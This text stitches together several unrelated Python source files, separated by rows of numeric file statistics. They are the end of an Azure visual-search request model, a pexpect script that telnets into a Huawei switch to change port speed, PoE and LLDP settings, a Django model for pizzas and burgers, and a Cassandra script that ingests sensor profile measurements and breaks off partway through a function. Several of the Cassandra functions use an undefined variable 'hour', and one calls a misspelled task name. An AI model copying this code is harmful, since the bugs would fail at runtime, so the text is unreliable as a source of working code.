:param image_info: A JSON object that identities the image to get insights of.
:type image_info: ~visual_search_client.models.ImageInfo
:param knowledge_request: A JSON object containing information about the request, such as
filters, or a description.
:type knowledge_request: ~visual_search_client.models.KnowledgeRequest
"""
_attribute_map = {
'image_info': {'key': 'imageInfo', 'type': 'ImageInfo'},
'knowledge_request': {'key': 'knowledgeRequest', 'type': 'KnowledgeRequest'},
}
def __init__(
self,
**kwargs
):
super(VisualSearchRequest, self).__init__(**kwargs)
self.image_info = kwargs.get('image_info', None)
self.knowledge_request = kwargs.get('knowledge_request', None)
| 40.119099
| 271
| 0.611578
| 13,491
| 110,488
| 4.885479
| 0.053814
| 0.041208
| 0.018571
| 0.027674
| 0.809285
| 0.787179
| 0.778941
| 0.753877
| 0.74975
| 0.743878
| 0
| 0.001021
| 0.237447
| 110,488
| 2,753
| 272
| 40.133672
| 0.781254
| 0.483546
| 0
| 0.743976
| 1
| 0
| 0.344387
| 0.003716
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031627
| false
| 0
| 0.001506
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
127c540ca775ec4f4070d88907e7e29e4bff751f
| 3,831
|
py
|
Python
|
fnat_testset/testlib/Huawei3328.py
|
lizhouw-netscout/fnat
|
684958773379a9205857f1932de443ed0c4334a0
|
[
"Apache-2.0"
] | null | null | null |
fnat_testset/testlib/Huawei3328.py
|
lizhouw-netscout/fnat
|
684958773379a9205857f1932de443ed0c4334a0
|
[
"Apache-2.0"
] | null | null | null |
fnat_testset/testlib/Huawei3328.py
|
lizhouw-netscout/fnat
|
684958773379a9205857f1932de443ed0c4334a0
|
[
"Apache-2.0"
] | null | null | null |
import pexpect
class Huawei3328:
def __init__(self,str_host,str_user=None,str_passwd=None):
self.ipaddr=str_host
print('Huawei3328')
def set_speed_duplex_value(self,port,speed,duplex):
if (speed == 'auto' and duplex == 'auto'):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("<Quidway>")
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('negotiation auto')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
else:
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("<Quidway>")
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('undo negotiation auto')
child.sendline('speed %s' % speed)
child.sendline('duplex %s' % duplex)
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_poe_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("<Quidway>")
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('poe enable')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_poe_disable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("<Quidway>")
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('undo poe enable')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("<Quidway>")
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('lldp enable')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_disable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
index=child.expect("<Quidway>")
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('undo lldp enable')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
| 37.194175
| 71
| 0.528322
| 410
| 3,831
| 4.890244
| 0.134146
| 0.246384
| 0.152618
| 0.131671
| 0.874813
| 0.874813
| 0.874813
| 0.874813
| 0.874813
| 0.874813
| 0
| 0.010322
| 0.342469
| 3,831
| 102
| 72
| 37.558824
| 0.785629
| 0
| 0
| 0.793478
| 0
| 0
| 0.193784
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0.01087
| 0.01087
| 0
| 0.086957
| 0.076087
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
128f99f10db94172b49267c111a6a535911f3722
| 507
|
py
|
Python
|
food/models.py
|
Frank1963-mpoyi/Fast-Food-Web-App
|
4dff055c6785708b6bf98bfb5fac13dc61e089bc
|
[
"MIT"
] | null | null | null |
food/models.py
|
Frank1963-mpoyi/Fast-Food-Web-App
|
4dff055c6785708b6bf98bfb5fac13dc61e089bc
|
[
"MIT"
] | null | null | null |
food/models.py
|
Frank1963-mpoyi/Fast-Food-Web-App
|
4dff055c6785708b6bf98bfb5fac13dc61e089bc
|
[
"MIT"
] | null | null | null |
from django.db import models
class Pizza(models.Model):
name = models.CharField(max_length=120)
priceM = models.DecimalField(max_digits=4, decimal_places=2)
priceL = models.DecimalField(max_digits=4, decimal_places=2)
pImage = models.URLField()
class Burger(models.Model):
name = models.CharField(max_length=120)
priceM = models.DecimalField(max_digits=4, decimal_places=2)
priceL = models.DecimalField(max_digits=4, decimal_places=2)
bImage = models.URLField()
| 29.823529
| 64
| 0.731755
| 67
| 507
| 5.38806
| 0.373134
| 0.199446
| 0.232687
| 0.299169
| 0.764543
| 0.764543
| 0.764543
| 0.764543
| 0.764543
| 0.764543
| 0
| 0.032864
| 0.159763
| 507
| 17
| 65
| 29.823529
| 0.814554
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
12f7c3e6b9c591636bf2b34b2fc629208a6099f2
| 71,151
|
py
|
Python
|
cassandra_storage.py
|
SunBurst/hydroview-celery
|
a69e6b5ec755bb91056a30b924e7d7c05386898a
|
[
"MIT"
] | null | null | null |
cassandra_storage.py
|
SunBurst/hydroview-celery
|
a69e6b5ec755bb91056a30b924e7d7c05386898a
|
[
"MIT"
] | null | null | null |
cassandra_storage.py
|
SunBurst/hydroview-celery
|
a69e6b5ec755bb91056a30b924e7d7c05386898a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env
# -*- coding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import argparse
import datetime
import logging.config
import pytz
from campbellsciparser import cr
from tasks import insert_to_daily_single_measurements_by_sensor
from tasks import insert_to_hourly_single_measurements_by_sensor
from tasks import insert_to_thirty_min_single_measurements_by_sensor
from tasks import insert_to_twenty_min_single_measurements_by_sensor
from tasks import insert_to_fifteen_min_single_measurements_by_sensor
from tasks import insert_to_ten_min_single_measurements_by_sensor
from tasks import insert_to_five_min_single_measurements_by_sensor
from tasks import insert_to_one_min_single_measurements_by_sensor
from tasks import insert_to_one_sec_single_measurements_by_sensor
from tasks import insert_to_daily_profile_measurements_by_sensor
from tasks import insert_to_hourly_profile_measurements_by_sensor
from tasks import insert_to_thirty_min_profile_measurements_by_sensor
from tasks import insert_to_twenty_min_profile_measurements_by_sensor
from tasks import insert_to_fifteen_min_profile_measurements_by_sensor
from tasks import insert_to_ten_min_profile_measurements_by_sensor
from tasks import insert_to_five_min_profile_measurements_by_sensor
from tasks import insert_to_one_min_profile_measurements_by_sensor
from tasks import insert_to_one_sec_profile_measurements_by_sensor
import utils
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
APP_CONFIG_PATH = os.path.join(BASE_DIR, 'cfg/appconfig.yaml')
LOGGING_CONFIG_PATH = os.path.join(BASE_DIR, 'cfg/logging.yaml')
logging_conf = utils.load_config(LOGGING_CONFIG_PATH)
logging.config.dictConfig(logging_conf)
logger_info = logging.getLogger('cassandra_storage_info')
logger_debug = logging.getLogger('cassandra_storage_debug')
def process_daily_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_daily_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_daily_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_daily_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(day.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_daily_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_daily_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(day.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_daily_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_hourly_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_hourly_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_hourly_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_hourly_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
hour = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
value_type = param_info.get('value_type')
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_hourly_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_hourly_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
hour = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_hourly_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_thirty_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_thirty_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_thirty_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_thirty_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_thirty_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_thirty_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_thirty_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_twenty_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_twenty_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_twenty_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_twenty_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_twenty_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_twenty_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_twenty_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_fifteen_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_fifteen_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_fifteen_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_fifteen_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_fifteen_min_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_fifteen_min_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(profile_ts.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_fifteen_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_ten_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_ten_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_ten_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_ten_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
month_first_day = datetime.datetime(ts.year, ts.month, 1).strftime("%Y-%m-%d")
profile_ts = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, month_first_day, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
